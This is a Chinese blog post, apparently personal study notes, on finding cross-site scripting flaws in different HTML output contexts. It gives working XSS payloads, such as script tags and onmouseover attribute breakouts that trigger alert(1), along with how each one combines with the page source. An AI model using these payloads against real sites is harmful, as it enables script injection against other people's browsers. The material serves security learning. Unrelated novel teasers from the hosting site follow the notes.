xss漏洞挖掘

--《web前端黑客技術(shù)加密》

HTML標簽之間

普通場景
<div id="body">[輸出]</div>

提交

id=1<script>alert(1)</script>

綜合

<div id="body">1<script>alert(1)</script></div>
無法執(zhí)行腳本的標簽

title:定義文檔的標題
textarea:定義多行的文本輸入控件
xmp:定義預(yù)格式文本贸营。
iframe:創(chuàng)建包含另外一個文檔的內(nèi)聯(lián)框架(即行內(nèi)框架)
noscript:定義在腳本未被執(zhí)行時的替代內(nèi)容(文本)
noframes:可為那些不支持框架的瀏覽器顯示文本祠肥。noframes 元素位于 frameset 元素內(nèi)部。
plaintext:純文本拂共,和 pre 一樣,代碼中的空格和換行會直接顯示到頁面上料饥。另外 < 和 > 和 & 也會直接顯示蒲犬。
解決方法:閉合,例如title

</title><script>alert</script>

HTML標簽之內(nèi)

普通場景
<input id="text" value="[輸出]"/>

提交

"onmouseover=alert(1)x="

綜合為:

<input id="text" value=""onmouseover=alert(1)x=""/>
"><script>alert(1)</script>

綜合為:

<input id="text" value=""><script>alert(1)</script>"/>

書上解釋為:這種是閉合屬性后又閉合標簽岸啡,然后直接執(zhí)行腳本
同學(xué)解釋為:input標簽不需要閉合即執(zhí)行原叮,在達到目的后,后面無閉合已無所謂

其它場景

type為hidden
1)閉合
2)若type在輸出后巡蘸,可在payload中加入type=text
例如:
原語句為:

<input value="輸入" type=hidden"/>

payload:

1" onmouserover=alert(1) type="text

綜合為:

<input value="1" onmouserover=alert(1) type="text" type=hidden"/>

2.待續(xù)吧奋隶。。悦荒。

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末唯欣,一起剝皮案震驚了整個濱河市,隨后出現(xiàn)的幾起案子搬味,更是在濱河造成了極大的恐慌境氢,老刑警劉巖,帶你破解...
    沈念sama閱讀 211,123評論 6 490
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件碰纬,死亡現(xiàn)場離奇詭異萍聊,居然都是意外死亡,警方通過查閱死者的電腦和手機悦析,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 90,031評論 2 384
  • 文/潘曉璐 我一進店門寿桨,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人强戴,你說我怎么就攤上這事亭螟。” “怎么了骑歹?”我有些...
    開封第一講書人閱讀 156,723評論 0 345
  • 文/不壞的土叔 我叫張陵预烙,是天一觀的道長。 經(jīng)常有香客問我陵刹,道長默伍,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 56,357評論 1 283
  • 正文 為了忘掉前任衰琐,我火速辦了婚禮,結(jié)果婚禮上炼蹦,老公的妹妹穿的比我還像新娘羡宙。我一直安慰自己,他們只是感情好掐隐,可當我...
    茶點故事閱讀 65,412評論 5 384
  • 文/花漫 我一把揭開白布狗热。 她就那樣靜靜地躺著钞馁,像睡著了一般。 火紅的嫁衣襯著肌膚如雪匿刮。 梳的紋絲不亂的頭發(fā)上僧凰,一...
    開封第一講書人閱讀 49,760評論 1 289
  • 那天,我揣著相機與錄音熟丸,去河邊找鬼训措。 笑死,一個胖子當著我的面吹牛光羞,可吹牛的內(nèi)容都是我干的绩鸣。 我是一名探鬼主播,決...
    沈念sama閱讀 38,904評論 3 405
  • 文/蒼蘭香墨 我猛地睜開眼纱兑,長吁一口氣:“原來是場噩夢啊……” “哼呀闻!你這毒婦竟也來了?” 一聲冷哼從身側(cè)響起潜慎,我...
    開封第一講書人閱讀 37,672評論 0 266
  • 序言:老撾萬榮一對情侶失蹤捡多,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后铐炫,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體垒手,經(jīng)...
    沈念sama閱讀 44,118評論 1 303
  • 正文 獨居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 36,456評論 2 325
  • 正文 我和宋清朗相戀三年驳遵,在試婚紗的時候發(fā)現(xiàn)自己被綠了淫奔。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點故事閱讀 38,599評論 1 340
  • 序言:一個原本活蹦亂跳的男人離奇死亡堤结,死狀恐怖唆迁,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情竞穷,我是刑警寧澤唐责,帶...
    沈念sama閱讀 34,264評論 4 328
  • 正文 年R本政府宣布,位于F島的核電站瘾带,受9級特大地震影響鼠哥,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜看政,卻給世界環(huán)境...
    茶點故事閱讀 39,857評論 3 312
  • 文/蒙蒙 一朴恳、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧允蚣,春花似錦于颖、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,731評論 0 21
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽做入。三九已至,卻和暖如春同衣,著一層夾襖步出監(jiān)牢的瞬間竟块,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 31,956評論 1 264
  • 我被黑心中介騙來泰國打工耐齐, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留浪秘,地道東北人。 一個月前我還...
    沈念sama閱讀 46,286評論 2 360
  • 正文 我出身青樓蚪缀,卻偏偏與公主長得像秫逝,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個殘疾皇子询枚,可洞房花燭夜當晚...
    茶點故事閱讀 43,465評論 2 348

推薦閱讀更多精彩內(nèi)容

  • XSS的檢測 檢測XSS一般分兩種方法:一種是手工檢測违帆、一種是軟件自動檢測手工檢測:檢測結(jié)果準確,但對于大型web...
    cws閱讀 8,364評論 3 25
  • Spring Cloud為開發(fā)人員提供了快速構(gòu)建分布式系統(tǒng)中一些常見模式的工具(例如配置管理金蜀,服務(wù)發(fā)現(xiàn)刷后,斷路器,智...
    卡卡羅2017閱讀 134,628評論 18 139
  • HTML標簽解釋大全 一渊抄、HTML標記 標簽:!DOCTYPE 說明:指定了 HTML 文檔遵循的文檔類型定義(D...
    米塔塔閱讀 3,229評論 1 41
  • HTML5 標簽comment 注釋標簽用于在源文檔中插入注釋尝胆。注釋內(nèi)容不會被瀏覽器顯示。為代碼編寫注釋的好處是...
    才気莮孒閱讀 4,049評論 1 25
  • 0.B/S結(jié)構(gòu) 瀏覽器服務(wù)器模式,web瀏覽器是客戶端最主要的應(yīng)用軟件.將客戶端使用web進行統(tǒng)一,系統(tǒng)功能實現(xiàn)集...
    liusong007閱讀 1,048評論 0 1